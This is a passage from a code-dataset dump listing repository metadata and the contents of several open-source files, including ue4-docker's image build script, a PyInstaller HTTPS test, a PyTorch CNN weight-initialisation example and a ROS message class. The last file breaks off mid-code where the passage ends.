| Column | Type | Range / Values |
| --- | --- | --- |
| hexsha | stringlengths | 40..40 |
| size | int64 | 1..1.03M |
| ext | stringclasses | 10 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 3..239 |
| max_stars_repo_name | stringlengths | 5..130 |
| max_stars_repo_head_hexsha | stringlengths | 40..78 |
| max_stars_repo_licenses | sequencelengths | 1..10 |
| max_stars_count | int64 | 1..191k ⌀ |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24..24 ⌀ |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24..24 ⌀ |
| max_issues_repo_path | stringlengths | 3..239 |
| max_issues_repo_name | stringlengths | 5..130 |
| max_issues_repo_head_hexsha | stringlengths | 40..78 |
| max_issues_repo_licenses | sequencelengths | 1..10 |
| max_issues_count | int64 | 1..67k ⌀ |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24..24 ⌀ |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24..24 ⌀ |
| max_forks_repo_path | stringlengths | 3..239 |
| max_forks_repo_name | stringlengths | 5..130 |
| max_forks_repo_head_hexsha | stringlengths | 40..78 |
| max_forks_repo_licenses | sequencelengths | 1..10 |
| max_forks_count | int64 | 1..105k ⌀ |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24..24 ⌀ |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24..24 ⌀ |
| content | stringlengths | 1..1.03M |
| avg_line_length | float64 | 1..958k |
| max_line_length | int64 | 1..1.03M |
| alphanum_fraction | float64 | 0..1 |
4a1f3a1a459e4429145178dc359b6f5b22d51211 | 22,844 | py | Python | ue4docker/build.py | jonghyunho/ue4-docker | 9e18e139c17ae09475df64f59f8ad5fbb3d32626 | ["MIT"] | 579 | 2018-05-05T04:39:46.000Z | 2022-03-29T10:22:21.000Z | ue4docker/build.py | jonghyunho/ue4-docker | 9e18e139c17ae09475df64f59f8ad5fbb3d32626 | ["MIT"] | 221 | 2018-07-01T20:30:18.000Z | 2022-03-28T14:56:52.000Z | ue4docker/build.py | jonghyunho/ue4-docker | 9e18e139c17ae09475df64f59f8ad5fbb3d32626 | ["MIT"] | 132 | 2018-05-06T16:28:31.000Z | 2022-03-16T12:44:19.000Z |
import argparse, getpass, humanfriendly, json, os, shutil, sys, tempfile, time
from .infrastructure import *
from .version import __version__
from os.path import join
def _getCredential(args, name, envVar, promptFunc):
# Check if the credential was specified via the command-line
if getattr(args, name, None) is not None:
print("Using {} specified via `-{}` command-line argument.".format(name, name))
return getattr(args, name)
# Check if the credential was specified via an environment variable
if envVar in os.environ:
print("Using {} specified via {} environment variable.".format(name, envVar))
return os.environ[envVar]
# Fall back to prompting the user for the value
return promptFunc()
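# The fallback order above (explicit command-line argument, then the UE4DOCKER_USERNAME /
# UE4DOCKER_PASSWORD environment variables, then an interactive prompt) means a CI job can
# export the environment variables and never be prompted; that CI scenario is just an
# illustration, the resolution order itself is what the function implements.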
def _getUsername(args):
return _getCredential(
args, "username", "UE4DOCKER_USERNAME", lambda: input("Username: ")
)
def _getPassword(args):
return _getCredential(
args, "password", "UE4DOCKER_PASSWORD", lambda: getpass.getpass("Password: ")
)
def build():
# Create our logger to generate coloured output on stderr
logger = Logger(prefix="[{} build] ".format(sys.argv[0]))
# Register our supported command-line arguments
parser = argparse.ArgumentParser(prog="{} build".format(sys.argv[0]))
BuildConfiguration.addArguments(parser)
# If no command-line arguments were supplied, display the help message and exit
if len(sys.argv) < 2:
parser.print_help()
sys.exit(0)
# Parse the supplied command-line arguments
try:
config = BuildConfiguration(parser, sys.argv[1:])
except RuntimeError as e:
logger.error("Error: {}".format(e))
sys.exit(1)
# Verify that Docker is installed
if DockerUtils.installed() == False:
logger.error(
"Error: could not detect Docker version. Please ensure Docker is installed."
)
sys.exit(1)
# Verify that we aren't trying to build Windows containers under Windows 10 when in Linux container mode (or vice versa)
# (Note that we don't bother performing this check when we're just copying Dockerfiles to an output directory)
if config.layoutDir is None:
dockerPlatform = DockerUtils.info()["OSType"].lower()
if config.containerPlatform == "windows" and dockerPlatform == "linux":
logger.error(
"Error: cannot build Windows containers when Docker Desktop is in Linux container",
False,
)
logger.error(
"mode. Use the --linux flag if you want to build Linux containers instead.",
False,
)
sys.exit(1)
elif config.containerPlatform == "linux" and dockerPlatform == "windows":
logger.error(
"Error: cannot build Linux containers when Docker Desktop is in Windows container",
False,
)
logger.error(
"mode. Remove the --linux flag if you want to build Windows containers instead.",
False,
)
sys.exit(1)
# Create an auto-deleting temporary directory to hold our build context
with tempfile.TemporaryDirectory() as tempDir:
# Copy our Dockerfiles to the temporary directory
contextOrig = join(os.path.dirname(os.path.abspath(__file__)), "dockerfiles")
contextRoot = join(tempDir, "dockerfiles")
shutil.copytree(contextOrig, contextRoot)
# Create the builder instance to build the Docker images
builder = ImageBuilder(
contextRoot,
config.containerPlatform,
logger,
config.rebuild,
config.dryRun,
config.layoutDir,
config.opts,
config.combine,
)
# Resolve our main set of tags for the generated images
mainTags = [
"{}{}-{}".format(config.release, config.suffix, config.prereqsTag),
config.release + config.suffix,
]
# Print the command-line invocation that triggered this build, masking any supplied passwords
args = [
"*******"
if config.args.password is not None and arg == config.args.password
else arg
for arg in sys.argv
]
logger.info("COMMAND-LINE INVOCATION:", False)
logger.info(str(args), False)
# Print the details of the Unreal Engine version being built
logger.info("UNREAL ENGINE VERSION SETTINGS:")
logger.info(
"Custom build: {}".format("Yes" if config.custom == True else "No"), False
)
if config.custom == True:
logger.info("Custom name: " + config.release, False)
else:
logger.info("Release: " + config.release, False)
logger.info("Repository: " + config.repository, False)
logger.info("Branch/tag: " + config.branch + "\n", False)
# Determine if we are using a custom version for ue4cli or conan-ue4cli
if config.ue4cliVersion is not None or config.conanUe4cliVersion is not None:
logger.info("CUSTOM PACKAGE VERSIONS:", False)
logger.info(
"ue4cli: {}".format(
config.ue4cliVersion
if config.ue4cliVersion is not None
else "default"
),
False,
)
logger.info(
"conan-ue4cli: {}\n".format(
config.conanUe4cliVersion
if config.conanUe4cliVersion is not None
else "default"
),
False,
)
# Report any advanced configuration options that were specified
if len(config.opts) > 0:
logger.info("ADVANCED CONFIGURATION OPTIONS:", False)
for key, value in sorted(config.opts.items()):
logger.info("{}: {}".format(key, json.dumps(value)), False)
print("", file=sys.stderr, flush=True)
# Determine if we are building Windows or Linux containers
if config.containerPlatform == "windows":
# Provide the user with feedback so they are aware of the Windows-specific values being used
logger.info("WINDOWS CONTAINER SETTINGS", False)
logger.info(
"Isolation mode: {}".format(config.isolation), False
)
logger.info(
"Base OS image: {}".format(config.baseImage), False
)
logger.info(
"Dll source image: {}".format(config.dllSrcImage), False
)
logger.info(
"Host OS: {}".format(WindowsUtils.systemString()),
False,
)
logger.info(
"Memory limit: {}".format(
"No limit"
if config.memLimit is None
else "{:.2f}GB".format(config.memLimit)
),
False,
)
logger.info(
"Detected max image size: {:.0f}GB".format(DockerUtils.maxsize()),
False,
)
logger.info(
"Visual Studio: {}".format(config.visualStudio), False
)
# Verify that the host OS is not a release that is blacklisted due to critical bugs
if (
config.ignoreBlacklist == False
and WindowsUtils.isBlacklistedWindowsHost() == True
):
logger.error(
"Error: detected blacklisted host OS version: {}".format(
WindowsUtils.systemString()
),
False,
)
logger.error("", False)
logger.error(
"This version of Windows contains one or more critical bugs that",
False,
)
logger.error(
"render it incapable of successfully building UE4 container images.",
False,
)
logger.error(
"You will need to use an older or newer version of Windows.", False
)
logger.error("", False)
logger.error("For more information, see:", False)
logger.error(
"https://unrealcontainers.com/docs/concepts/windows-containers",
False,
)
sys.exit(1)
# Verify that the user is not attempting to build images with a newer kernel version than the host OS
newer_check = WindowsUtils.isNewerBaseTag(
config.hostBasetag, config.basetag
)
if newer_check:
logger.error(
"Error: cannot build container images with a newer kernel version than that of the host OS!"
)
sys.exit(1)
elif newer_check is None:
logger.info(
"Warning: unable to determine whether host system is new enough to use specified base tag"
)
# Ensure the Docker daemon is configured correctly
requiredLimit = WindowsUtils.requiredSizeLimit()
if DockerUtils.maxsize() < requiredLimit:
logger.error("SETUP REQUIRED:")
logger.error(
"The max image size for Windows containers must be set to at least {}GB.".format(
requiredLimit
)
)
logger.error(
"See the Microsoft documentation for configuration instructions:"
)
logger.error(
"https://docs.microsoft.com/en-us/virtualization/windowscontainers/manage-containers/container-storage#storage-limits"
)
logger.error(
"Under Windows Server, the command `{} setup` can be used to automatically configure the system.".format(
sys.argv[0]
)
)
sys.exit(1)
elif config.containerPlatform == "linux":
# Determine if we are building CUDA-enabled container images
capabilities = (
"CUDA {} + OpenGL".format(config.cuda)
if config.cuda is not None
else "OpenGL"
)
logger.info("LINUX CONTAINER SETTINGS", False)
logger.info(
"Building GPU-enabled images compatible with NVIDIA Docker ({} support).\n".format(
capabilities
),
False,
)
# Report which Engine components are being excluded (if any)
logger.info("GENERAL SETTINGS", False)
logger.info(
"Changelist override: {}".format(
config.changelist
if config.changelist is not None
else "(None specified)"
),
False,
)
if len(config.excludedComponents) > 0:
logger.info("Excluding the following Engine components:", False)
for component in config.describeExcludedComponents():
logger.info("- {}".format(component), False)
else:
logger.info("Not excluding any Engine components.", False)
# Determine if we need to prompt for credentials
if config.dryRun == True:
# Don't bother prompting the user for any credentials during a dry run
logger.info(
"Performing a dry run, `docker build` commands will be printed and not executed.",
False,
)
username = ""
password = ""
elif config.layoutDir is not None:
# Don't bother prompting the user for any credentials when we're just copying the Dockerfiles to a directory
logger.info(
"Copying generated Dockerfiles to: {}".format(config.layoutDir), False
)
username = ""
password = ""
elif builder.willBuild("ue4-source", mainTags) == False:
# Don't bother prompting the user for any credentials if we're not building the ue4-source image
logger.info(
"Not building the ue4-source image, no Git credentials required.", False
)
username = ""
password = ""
else:
# Retrieve the Git username and password from the user when building the ue4-source image
print(
"\nRetrieving the Git credentials that will be used to clone the UE4 repo"
)
username = _getUsername(config.args)
password = _getPassword(config.args)
print()
# If resource monitoring has been enabled, start the resource monitoring background thread
resourceMonitor = ResourceMonitor(logger, config.args.interval)
if config.args.monitor == True:
resourceMonitor.start()
# Start the HTTP credential endpoint as a child process and wait for it to start
endpoint = None
if config.opts.get("credential_mode", "endpoint") == "endpoint":
endpoint = CredentialEndpoint(username, password)
endpoint.start()
try:
# Keep track of our starting time
startTime = time.time()
# If we're copying Dockerfiles to an output directory then make sure it exists and is empty
if config.layoutDir is not None:
if os.path.exists(config.layoutDir):
shutil.rmtree(config.layoutDir)
os.makedirs(config.layoutDir)
# Keep track of the images we've built
builtImages = []
commonArgs = [
"--build-arg",
"NAMESPACE={}".format(GlobalConfiguration.getTagNamespace()),
]
# Compute the build options for the UE4 build prerequisites image
# (This is the only image that does not use any user-supplied tag suffix, since the tag always reflects any customisations)
prereqsArgs = ["--build-arg", "BASEIMAGE=" + config.baseImage]
if config.containerPlatform == "windows":
prereqsArgs = prereqsArgs + [
"--build-arg",
"DLLSRCIMAGE=" + config.dllSrcImage,
"--build-arg",
"VISUAL_STUDIO_BUILD_NUMBER=" + config.visualStudioBuildNumber,
]
# Build the UE4 build prerequisites image
builder.build(
"ue4-build-prerequisites",
[config.prereqsTag],
commonArgs + config.platformArgs + prereqsArgs,
)
builtImages.append("ue4-build-prerequisites")
# If we're using build secrets then pass the Git username and password to the UE4 source image as secrets
secrets = {}
if config.opts.get("credential_mode", "endpoint") == "secrets":
secrets = {"username": username, "password": password}
# Build the UE4 source image
prereqConsumerArgs = [
"--build-arg",
"PREREQS_TAG={}".format(config.prereqsTag),
]
credentialArgs = [] if len(secrets) > 0 else endpoint.args()
ue4SourceArgs = prereqConsumerArgs + [
"--build-arg",
"GIT_REPO={}".format(config.repository),
"--build-arg",
"GIT_BRANCH={}".format(config.branch),
"--build-arg",
"VERBOSE_OUTPUT={}".format("1" if config.verbose == True else "0"),
]
builder.build(
"ue4-source",
mainTags,
commonArgs + config.platformArgs + ue4SourceArgs + credentialArgs,
secrets,
)
builtImages.append("ue4-source")
# Build the UE4 Engine source build image, unless requested otherwise by the user
ue4BuildArgs = prereqConsumerArgs + [
"--build-arg",
"TAG={}".format(mainTags[1]),
]
if config.noEngine == False:
builder.build(
"ue4-engine",
mainTags,
commonArgs + config.platformArgs + ue4BuildArgs,
)
builtImages.append("ue4-engine")
else:
logger.info(
"User specified `--no-engine`, skipping ue4-engine image build."
)
# Build the minimal UE4 CI image, unless requested otherwise by the user
minimalArgs = (
["--build-arg", "CHANGELIST={}".format(config.changelist)]
if config.changelist is not None
else []
)
buildUe4Minimal = config.noMinimal == False
if buildUe4Minimal == True:
builder.build(
"ue4-minimal",
mainTags,
commonArgs + config.platformArgs + ue4BuildArgs + minimalArgs,
)
builtImages.append("ue4-minimal")
else:
logger.info(
"User specified `--no-minimal`, skipping ue4-minimal image build."
)
# Build the full UE4 CI image, unless requested otherwise by the user
buildUe4Full = buildUe4Minimal == True and config.noFull == False
if buildUe4Full == True:
# If custom version strings were specified for ue4cli and/or conan-ue4cli, use them
infrastructureFlags = []
if config.ue4cliVersion is not None:
infrastructureFlags.extend(
[
"--build-arg",
"UE4CLI_VERSION={}".format(config.ue4cliVersion),
]
)
if config.conanUe4cliVersion is not None:
infrastructureFlags.extend(
[
"--build-arg",
"CONAN_UE4CLI_VERSION={}".format(config.conanUe4cliVersion),
]
)
# Build the image
builder.build(
"ue4-full",
mainTags,
commonArgs
+ config.platformArgs
+ ue4BuildArgs
+ infrastructureFlags,
)
builtImages.append("ue4-full")
else:
logger.info(
"Not building ue4-minimal or user specified `--no-full`, skipping ue4-full image build."
)
# If we are generating Dockerfiles then include information about the options used to generate them
if config.layoutDir is not None:
# Determine whether we generated a single combined Dockerfile or a set of Dockerfiles
if config.combine == True:
# Generate a comment to place at the top of the single combined Dockerfile
lines = [
"This file was generated by ue4-docker version {} with the following options:".format(
__version__
),
"",
]
lines.extend(
[
"- {}: {}".format(key, json.dumps(value))
for key, value in sorted(config.opts.items())
]
)
lines.extend(
[
"",
"This Dockerfile combines the steps for the following images:",
"",
]
)
lines.extend(["- {}".format(image) for image in builtImages])
comment = "\n".join(["# {}".format(line) for line in lines])
# Inject the comment at the top of the Dockerfile, being sure to place it after any `escape` parser directive
dockerfile = join(config.layoutDir, "combined", "Dockerfile")
dockerfileContents = FilesystemUtils.readFile(dockerfile)
if dockerfileContents.startswith("# escape"):
newline = dockerfileContents.index("\n")
dockerfileContents = (
dockerfileContents[0 : newline + 1]
+ "\n"
+ comment
+ "\n\n"
+ dockerfileContents[newline + 1 :]
)
else:
dockerfileContents = comment + "\n\n" + dockerfileContents
FilesystemUtils.writeFile(dockerfile, dockerfileContents)
else:
# Create a JSON file to accompany the set of generated Dockerfiles
FilesystemUtils.writeFile(
join(config.layoutDir, "generated.json"),
json.dumps(
{
"version": __version__,
"images": builtImages,
"opts": config.opts,
},
indent=4,
sort_keys=True,
),
)
# Report the total execution time
endTime = time.time()
logger.action(
"Total execution time: {}".format(
humanfriendly.format_timespan(endTime - startTime)
)
)
# Stop the resource monitoring background thread if it is running
resourceMonitor.stop()
# Stop the HTTP server
if endpoint is not None:
endpoint.stop()
except (Exception, KeyboardInterrupt) as e:
# One of the images failed to build
logger.error("Error: {}".format(e))
resourceMonitor.stop()
if endpoint is not None:
endpoint.stop()
sys.exit(1)
| 40.21831 | 138 | 0.516065 |
4a1f3a62bafc3b97a993a12a5bfe0fb8109ec257 | 2,840 | py | Python | tests/functional/scripts/pyi_lib_requests.py | hawkhai/pyinstaller | 016a24479b34de161792c72dde455a81ad4c78ae | ["Apache-2.0"] | 9,267 | 2015-01-01T04:08:45.000Z | 2022-03-31T11:42:38.000Z | tests/functional/scripts/pyi_lib_requests.py | hawkhai/pyinstaller | 016a24479b34de161792c72dde455a81ad4c78ae | ["Apache-2.0"] | 5,150 | 2015-01-01T12:09:56.000Z | 2022-03-31T18:06:12.000Z | tests/functional/scripts/pyi_lib_requests.py | hawkhai/pyinstaller | 016a24479b34de161792c72dde455a81ad4c78ae | ["Apache-2.0"] | 2,101 | 2015-01-03T10:25:27.000Z | 2022-03-30T11:04:42.000Z |
# -----------------------------------------------------------------------------
# Copyright (c) 2014-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
# -----------------------------------------------------------------------------
import socket
try:
import BaseHTTPServer
import SimpleHTTPServer
except ImportError:
import http.server as BaseHTTPServer
import http.server as SimpleHTTPServer
import os
import ssl
import sys
import threading
import time
import requests
"""
Note: to re-create the server.pem file use the following commands:
cd /path/to/pyinstaller.git/tests/functional
openssl req -new -x509 -keyout data/requests/server.pem \
-text -out data/requests/server.pem -days 36500 \
-nodes -config data/requests/openssl.conf
"""
if getattr(sys, 'frozen', False):
# We are running in a |PyInstaller| bundle.
basedir = sys._MEIPASS
else:
# We are running in a normal Python environment.
basedir = os.path.dirname(__file__)
SERVER_CERT = os.path.join(basedir, "server.pem")
if not os.path.exists(SERVER_CERT):
raise SystemExit('Certificate-File %s is missing' % SERVER_CERT)
def main():
SERVER_PORT = 8443
httpd = None
# Since unit tests run in parallel, the port may be in use, so retry creating the server while incrementing
# the port number.
while SERVER_PORT < 8493: # Max 50 retries
try:
# SSL server copied from here: http://www.piware.de/2011/01/creating-an-https-server-in-python/
httpd = BaseHTTPServer.HTTPServer(('localhost', SERVER_PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
except socket.error as e:
if e.errno == 98: # Address in use
SERVER_PORT += 1
continue
else:
# Some other socket.error
raise
else:
# Success
break
else:
# Did not break from loop, so we ran out of retries
assert False, "Could not bind server port: all ports in use."
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=SERVER_CERT, server_side=True)
def ssl_server():
httpd.serve_forever()
# Start the SSL server
thread = threading.Thread(target=ssl_server)
thread.daemon = True
thread.start()
# Wait a bit for the server to start
time.sleep(1)
# Use requests to get a page from the server
requests.get("https://localhost:{}".format(SERVER_PORT), verify=SERVER_CERT)
# requests.get("https://github.com")
if __name__ == '__main__':
main()
| 30.212766 | 116 | 0.640493 |
4a1f3a7b7afdf23c5694093baa462cd077e281f9 | 2,000 | py | Python | ML/Pytorch/Basics/pytorch_init_weights.py | xuyannus/Machine-Learning-Collection | 6d5dcd18d4e40f90e77355d56a2902e4c617ecbe | ["MIT"] | 3,094 | 2020-09-20T04:34:31.000Z | 2022-03-31T23:59:46.000Z | ML/Pytorch/Basics/pytorch_init_weights.py | xkhainguyen/Machine-Learning-Collection | 425d196e9477dbdbbd7cc0d19d29297571746ab5 | ["MIT"] | 79 | 2020-09-24T08:54:17.000Z | 2022-03-30T14:45:08.000Z | ML/Pytorch/Basics/pytorch_init_weights.py | xkhainguyen/Machine-Learning-Collection | 425d196e9477dbdbbd7cc0d19d29297571746ab5 | ["MIT"] | 1,529 | 2020-09-20T16:21:21.000Z | 2022-03-31T21:16:25.000Z |
"""
Example code of how to initialize weights for a simple CNN network.
Video explanation: https://youtu.be/xWQ-p_o0Uik
Got any questions leave a comment on youtube :)
Programmed by Aladdin Persson <aladdin.persson at hotmail dot com>
* 2020-04-10 Initial coding
"""
# Imports
import torch.nn as nn # All neural network modules, nn.Linear, nn.Conv2d, BatchNorm, Loss functions
import torch.nn.functional as F # All functions that don't have any parameters
class CNN(nn.Module):
def __init__(self, in_channels, num_classes):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(
in_channels=in_channels,
out_channels=6,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
)
self.pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
self.conv2 = nn.Conv2d(
in_channels=6,
out_channels=16,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
)
self.fc1 = nn.Linear(16 * 7 * 7, num_classes)
self.initialize_weights()
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.pool(x)
x = F.relu(self.conv2(x))
x = self.pool(x)
x = x.reshape(x.shape[0], -1)
x = self.fc1(x)
return x
def initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
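                # He/Kaiming initialization is well suited to the ReLU activations used in forward()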
nn.init.kaiming_uniform_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.kaiming_uniform_(m.weight)
nn.init.constant_(m.bias, 0)
if __name__ == "__main__":
model = CNN(in_channels=3, num_classes=10)
for param in model.parameters():
print(param)
| 28.571429 | 100 | 0.567 |
4a1f3b29d83ab19c1f0f1f31419de477df76699e | 79 | py | Python | keeper.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | ["MIT"] | null | null | null | keeper.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | ["MIT"] | null | null | null | keeper.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | ["MIT"] | null | null | null |
from keepercommander.__main__ import main
if __name__ == '__main__':
    main()
| 26.333333 | 41 | 0.746835 |
4a1f3bd92de07f93d8534c62db3c2d95012b23ad | 57 | py | Python | acmicpc/10699/10699.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | ["MIT"] | 3 | 2019-03-09T05:19:23.000Z | 2019-04-06T09:26:36.000Z | acmicpc/10699/10699.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | ["MIT"] | 1 | 2020-02-23T10:38:04.000Z | 2020-02-23T10:38:04.000Z | acmicpc/10699/10699.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | ["MIT"] | 1 | 2019-05-22T13:47:53.000Z | 2019-05-22T13:47:53.000Z |
import datetime
print(str(datetime.datetime.now())[:10])
| 19 | 40 | 0.754386 |
4a1f3bf34f9aba2cd44144acea1bcb7bd1e22ecc | 553 | py | Python | etl/load_parties_from_csv.py | The-Animals/data-pipeline | 57c46dfe42807743d07d9f33bb29a2247afe8aff | ["MIT"] | null | null | null | etl/load_parties_from_csv.py | The-Animals/data-pipeline | 57c46dfe42807743d07d9f33bb29a2247afe8aff | ["MIT"] | null | null | null | etl/load_parties_from_csv.py | The-Animals/data-pipeline | 57c46dfe42807743d07d9f33bb29a2247afe8aff | ["MIT"] | null | null | null |
from pkgutil import get_data
from pandas import read_csv
from io import StringIO
from storage_clients import MySqlClient, DbSchema
"""
load MLA data from data/parties.csv
"""
def load_parties():
table = DbSchema.parties
print('reading party data from csv')
data = StringIO(str(get_data('data', 'parties.csv').decode('utf-8')))
df = read_csv(data)
with MySqlClient() as mysql_client:
print('writing party data to database')
mysql_client.overwrite_table(table, df)
if __name__ == '__main__':
load_parties()
| 21.269231 | 73 | 0.705244 |
4a1f3c73eb2d0088f4261e1c181d6ad917a4006a | 776 | py | Python | plugins/qualys_ssl/komand_qualys_ssl/actions/status/schema.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | ["MIT"] | 46 | 2019-06-05T20:47:58.000Z | 2022-03-29T10:18:01.000Z | plugins/qualys_ssl/komand_qualys_ssl/actions/status/schema.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | ["MIT"] | 386 | 2019-06-07T20:20:39.000Z | 2022-03-30T17:35:01.000Z | plugins/qualys_ssl/komand_qualys_ssl/actions/status/schema.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | ["MIT"] | 43 | 2019-07-09T14:13:58.000Z | 2022-03-28T12:04:46.000Z |
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
DESCRIPTION = "Retrieve status codes"
class Input:
pass
class Output:
STATUSDETAILS = "statusDetails"
class StatusInput(komand.Input):
schema = json.loads("""
{}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class StatusOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"statusDetails": {
"type": "object",
"title": "Status Codes",
"description": "Status Codes",
"order": 1
}
},
"required": [
"statusDetails"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 16.510638 | 57 | 0.597938 |
4a1f3d59a36d2f37a96d2c9f3c056a99eaf2aa4d | 13,984 | py | Python | devel/lib/python2.7/dist-packages/yolov3_pytorch_ros/msg/_BoundingBoxes.py | elmexx/eWolf-Jetson | 34242b1cea360c1e81d0e26a9e8cb70cf9ca354e | ["MIT"] | null | null | null | devel/lib/python2.7/dist-packages/yolov3_pytorch_ros/msg/_BoundingBoxes.py | elmexx/eWolf-Jetson | 34242b1cea360c1e81d0e26a9e8cb70cf9ca354e | ["MIT"] | null | null | null | devel/lib/python2.7/dist-packages/yolov3_pytorch_ros/msg/_BoundingBoxes.py | elmexx/eWolf-Jetson | 34242b1cea360c1e81d0e26a9e8cb70cf9ca354e | ["MIT"] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from yolov3_pytorch_ros/BoundingBoxes.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
import yolov3_pytorch_ros.msg
class BoundingBoxes(genpy.Message):
_md5sum = "c03e7499c2e5b938e301fea76459b092"
_type = "yolov3_pytorch_ros/BoundingBoxes"
_has_header = True # flag to mark the presence of a Header object
_full_text = """# Copyright (c) 2017, Marko Bjelonic, Robotic Systems Lab, ETH Zurich
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Header header
Header image_header
BoundingBox[] bounding_boxes
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: yolov3_pytorch_ros/BoundingBox
# Copyright (c) 2017, Marko Bjelonic, Robotic Systems Lab, ETH Zurich
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
string Class
float64 probability
int64 xmin
int64 ymin
int64 xmax
int64 ymax
"""
__slots__ = ['header','image_header','bounding_boxes']
_slot_types = ['std_msgs/Header','std_msgs/Header','yolov3_pytorch_ros/BoundingBox[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,image_header,bounding_boxes
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
